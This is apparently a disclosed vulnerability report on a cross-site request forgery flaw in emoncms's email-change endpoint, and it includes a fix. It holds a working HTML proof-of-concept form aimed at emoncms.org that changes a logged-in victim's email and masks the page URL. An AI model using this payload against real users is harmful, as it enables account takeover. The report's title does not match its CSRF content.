Improper Authorization in Handler for Custom URL Scheme in emoncms/emoncms
Valid
Reported on Jul 15th 2021
✍️ Description
The request that changes a user's email address can be triggered cross-site (CSRF): it carries no anti-CSRF token and is accepted as a plain GET. An attacker who gets a logged-in victim to submit it can set the victim's email to an address the attacker controls, use the password-reset flow to receive the reset link at that address, and take over the account.
🕵️♂️ Proof of Concept
1. Log in to your account.
2. Create a file containing the following HTML.
3. The victim, while logged in, opens the HTML page (served from the attacker's site).
4. The email address is changed after clicking "Submit request".
// PoC.html
<html>
<body>
<!-- Rewrites the visible URL to "/" so the attacker page's address is less obvious to the victim -->
<script>history.pushState('', '', '/')</script>
<!-- No method attribute: the browser submits a GET to changeemail.json?email=...
     The victim's emoncms session cookie is attached automatically and no CSRF token is sent -->
<form action="https://emoncms.org/user/changeemail.json">
<!-- In a real attack this value is an address the attacker controls -->
<input type="hidden" name="email" value="victim@mail.com" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
💥 Impact
The attacker can take full control of the victim's account.
Fix
Require an anti-CSRF token on the email-change request: issue a random per-session token, include it in the legitimate form as a hidden field or send it from same-origin JavaScript in a custom request header, and reject any request where it is missing or does not match the session's token. A cross-site page cannot read the token and a cross-site form cannot set a custom header, so the PoC above stops working. Also accept the change only via POST: the PoC submits a top-level GET, and a session cookie marked SameSite=Lax is still sent on top-level GET navigations, so a method check (or SameSite=Strict) is needed in addition to the token. This is the quickest way to protect your users.